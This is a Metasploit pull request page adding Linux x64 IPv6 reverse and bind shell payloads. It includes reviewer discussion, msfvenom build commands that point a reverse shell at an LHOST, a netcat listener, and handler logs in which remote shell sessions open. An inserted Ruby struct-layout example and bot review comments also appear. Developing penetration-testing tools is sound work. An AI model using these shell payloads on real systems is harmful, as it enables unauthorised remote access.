
Add linux x64 ipv6 reverse shell #11039

Merged: 10 commits, Feb 1, 2019

Conversation

@epi052 (Contributor) commented Nov 29, 2018

Implements inline x86_64 Linux reverse bourne shell over IPv6.

Verification

List the steps needed to make sure this thing works

  • Select IPv6 address: ifconfig ...
  • Build executable: ./msfvenom -p linux/x64/shell_reverse_ipv6_tcp LHOST='dead:beef:2::1009' -f elf -o test.elf
  • Start an IPv6 netcat listener: nc -nvl6p 4444
  • Run binary: ./test.elf
  • Run command to test shell works: id

[screenshot eth0-scopeid: connect syscall output, to view the sockaddr_in6 struct]

Demonstration

Create elf and upload to remote machine


Start listener and catch callback


Implements inline x86_64 Linux reverse bourne shell over IPv6.
Offsets for scopeid and lport were incorrect in the previous commit.
Updated offsets to the correct values.  Confirmed by viewing the connect
syscall values with strace.
Implements inline x86_64 Linux bourne bind shell over IPv6.
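The offset bug the commits above describe (the scope id and port landing at the wrong byte positions in the struct handed to connect) is easiest to see against the struct layout itself. The following Ruby is an added example, not code from this PR or from Metasploit: it packs a Linux sockaddr_in6 from an address, port and scope id, decodes one back, and gives each field's bytes at its offset, so the struct strace shows at the connect syscall can be checked field by field. The address and port are the ones from the verification steps; everything else is generic socket layout.

```ruby
require 'ipaddr'

# Linux x86_64 struct sockaddr_in6 is 28 bytes; these byte offsets are what a
# payload that builds the struct on the stack for connect(2) has to get right:
#   0  sin6_family   uint16, host order, AF_INET6 == 10
#   2  sin6_port     uint16, network (big-endian) order
#   4  sin6_flowinfo uint32, normally 0
#   8  sin6_addr     16 raw address bytes
#  24  sin6_scope_id uint32, host order: interface index, required for fe80::/10
AF_INET6 = 10
SOCKADDR_IN6_LEN = 28
SOCKADDR_IN6_OFFSETS = { family: 0, port: 2, flowinfo: 4, addr: 8, scope_id: 24 }.freeze
SOCKADDR_IN6_SIZES   = { family: 2, port: 2, flowinfo: 4, addr: 16, scope_id: 4 }.freeze
SOCKADDR_IN6_FMT = 'SnLa16L' # native u16, big-endian u16, native u32, 16 bytes, native u32

def pack_sockaddr_in6(host, port, scope_id = 0)
  addr = IPAddr.new(host)
  raise ArgumentError, "not an IPv6 address: #{host}" unless addr.ipv6?
  raise ArgumentError, "port out of range: #{port}" unless (1..65_535).cover?(port)
  link_local = (addr.to_i >> 118) == 0x3FA # top ten bits 1111111010 == fe80::/10
  raise ArgumentError, "#{host} is link-local and needs a scope id" if link_local && scope_id.zero?
  [AF_INET6, port, 0, addr.hton, scope_id].pack(SOCKADDR_IN6_FMT)
end

def unpack_sockaddr_in6(bytes)
  unless bytes.bytesize == SOCKADDR_IN6_LEN
    raise ArgumentError, "expected #{SOCKADDR_IN6_LEN} bytes, got #{bytes.bytesize}"
  end
  family, port, flowinfo, raw, scope_id = bytes.unpack(SOCKADDR_IN6_FMT)
  raise ArgumentError, "sa_family #{family} is not AF_INET6" unless family == AF_INET6
  { family: family, port: port, flowinfo: flowinfo,
    addr: IPAddr.new_ntoh(raw).to_s, scope_id: scope_id }
end

# Hex of one field as it sits in memory, for comparing with strace's view of connect(2).
def field_hex(bytes, field)
  bytes.byteslice(SOCKADDR_IN6_OFFSETS.fetch(field), SOCKADDR_IN6_SIZES.fetch(field)).unpack1('H*')
end

if __FILE__ == $PROGRAM_NAME
  # Address and port taken from the verification steps in the PR description.
  sa = pack_sockaddr_in6('dead:beef:2::1009', 4444)
  SOCKADDR_IN6_OFFSETS.each { |f, off| puts format('%-9s @%2d  %s', f, off, field_hex(sa, f)) }
  p unpack_sockaddr_in6(sa)
end
```

A port that shows up at offset 24 or a scope id at offset 2 in the dump is exactly the kind of mistake the corrected commit fixed.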
@sempervictus (Contributor) commented:

Any chance you could implement via metasm in lib? Makes for much more reusable shellcode.
Thanks for pushing this.

@epi052 (Contributor, Author) commented Dec 4, 2018

I looked through the other payloads for examples. Are you asking for something similar to
metasploit-framework/modules/payloads/stages/linux/x64/meterpreter.rb?

All of the payloads I could find appear to have the assembly as a string, then a call to Metasm::Shellcode.assemble

Is that all you're looking for?

@OJ (Contributor) commented Dec 4, 2018 via email

Per the linked request
    rapid7#11039 (comment)
Rewrote previous payload module to make use of metasm for more reusable
shellcode.
@epi052 (Contributor, Author) commented Dec 5, 2018

Finished the bind shell. Mind taking a look at that before I do the reverse?

@epi052 (Contributor, Author) commented Dec 7, 2018

Both ipv6 payloads should be good to go.

Gemfile Outdated
@@ -1,4 +1,5 @@
source 'https://rubygems.org'
gem 'pry'
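Review bot: the added `gem 'pry'` line in the top-level Gemfile is unrelated to the payload modules this PR introduces and would change the framework's dependency set for every user; drop this hunk (together with the `binding.pry` call it exists to support) so the PR is limited to the two new payload modules.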
Member commented:

We probably don't need this in this PR.

Contributor commented:

Isn't pry already part of MSF? Or is that just a dev group thing?

Contributor Author commented:

I worked myself into a detached head state as far as git is concerned. Had never seen that and googled how to get the work I'd done back into the proper branch. The fix action snuck this little guy in. I never explicitly git added the Gemfile, however it got included and I didn't realize. I'll get it out of the PR shortly. Sorry about that.

Contributor Author commented:

Removed the modified Gemfile.

tcp_port.pop # removes the first useless / from the array
tcp_port.shift # removes the last useless / from the array
tcp_port = (port_order.map{|x| tcp_port[x]}).join('') # reorder the array and convert it to a string.
binding.pry
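Review bot: `binding.pry` on the last line is a leftover debugger breakpoint; if it shipped, generating the payload would stop in an interactive pry session (or raise NameError where pry is not loaded), so remove it before merge. The two comments above it are also swapped: `tcp_port.pop` removes the last element of the array and `tcp_port.shift` removes the first, so the comment on each line describes the other call.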
Contributor commented:

forgot something?

Contributor Author commented:

It appears so. I removed it from this branch/pull request. It looks like I need to go to git school... I clearly jacked something up. I wanted the two pull requests to be separate branches and separate work. However, it didn't work out that way. I'm sure it was user-error on my part. Thanks for checking it over.

I ended up getting both bind payloads in both branches exactly the same. Sorry again for the confusion.


Contributor Author commented:

Along the same lines, what should I do about the other PR, since this one has both payloads anyway?

Contributor commented:

We could close the other, or fix this one. Closing the other would likely be easier, but it is up to you.

Contributor Author commented:

Closed the other PR. Please let me know if anything else is needed on my end.

@epi052 epi052 mentioned this pull request Dec 20, 2018
@epi052 (Contributor, Author) commented Jan 24, 2019

I know you all have been doing great things getting MSF 5.0 out and obviously been busy. Just wanted to check in and see if there was anything I still needed to do for this. Thanks!

@bwatters-r7 (Contributor) commented:

tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom -p linux/x64/shell_reverse_ipv6_tcp -o revtcp_shell_ipv6.elf -f elf LHOST=fd34:fe56:7891:2f3a:eca2:a4dc:58c7:b176 LPORT=4567
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 90 bytes
Final size of elf file: 210 bytes
Saved as: revtcp_shell_ipv6.elf
On branch land-11039
nothing to commit, working directory clean
msf5 exploit(multi/handler) > set payload linux/x64/shell_reverse_ipv6_tcp
payload => linux/x64/shell_reverse_ipv6_tcp
msf5 exploit(multi/handler) > set lhost fd34:fe56:7891:2f3a:eca2:a4dc:58c7:b176
lhost => fd34:fe56:7891:2f3a:eca2:a4dc:58c7:b176
msf5 exploit(multi/handler) > set lport 4567
lport => 4567
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on fd34:fe56:7891:2f3a:eca2:a4dc:58c7:b176:4567 
[*] Command shell session 1 opened (fd34:fe56:7891:2f3a:eca2:a4dc:58c7:b176:4567 -> fd34:fe56:7891:2f3b:e5bf:bfc3:683c:74ee:57284) at 2019-02-01 11:34:40 -0600

id
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
pwd
/home/msfuser
ifconfig
ens32: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.134.159  netmask 255.255.255.0  broadcast 192.168.134.255
        inet6 fd34:fe56:7891:2f3b:f533:e23e:76b8:b9be  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::fdb9:5fa4:bd3a:780c  prefixlen 64  scopeid 0x20<link>
        inet6 fd34:fe56:7891:2f3b:e5bf:bfc3:683c:74ee  prefixlen 64  scopeid 0x0<global>
        ether 00:0c:29:08:11:58  txqueuelen 1000  (Ethernet)
        RX packets 192837  bytes 284112864 (284.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 117283  bytes 9710710 (9.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 373  bytes 29862 (29.8 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 373  bytes 29862 (29.8 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

@bwatters-r7 (Contributor) commented:

rapid7/metasploit-framework$ ./msfvenom -p linux/x64/shell_bind_ipv6_tcp -o bindtcp_shell_ipv6.elf -f elf LPORT=4567
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x64/shell_bind_ipv6_tcp):

   Name   Current Setting                          Required  Description
   ----   ---------------                          --------  -----------
   LPORT  4567                                     yes       The listen port
   RHOST  fd34:fe56:7891:2f3b:f533:e23e:76b8:b9be  no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > run

[*] Started bind TCP handler against fd34:fe56:7891:2f3b:f533:e23e:76b8:b9be:4567
[*] Command shell session 4 opened (fd34:fe56:7891:2f3a:eca2:a4dc:58c7:b176:39182 -> fd34:fe56:7891:2f3b:f533:e23e:76b8:b9be:4567) at 2019-02-01 15:50:15 -0600

id
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
pwd
/home/msfuser
exit
[*] fd34:fe56:7891:2f3b:f533:e23e:76b8:b9be - Command shell session 4 closed.

@bwatters-r7 bwatters-r7 self-assigned this Feb 1, 2019
@bwatters-r7 bwatters-r7 merged commit cb3ea8d into rapid7:master Feb 1, 2019
bwatters-r7 added a commit that referenced this pull request Feb 1, 2019
Merge branch 'land-11039' into upstream-master
@bwatters-r7 (Contributor) commented Feb 1, 2019

Release Notes

This adds Linux x86_64 IPv6 bind and reverse shell payloads to the framework.

msjenkins-r7 pushed a commit that referenced this pull request Feb 1, 2019
Merge branch 'land-11039' into upstream-master
@gdavidson-r7 gdavidson-r7 added the rn-enhancement release notes enhancement label Feb 21, 2019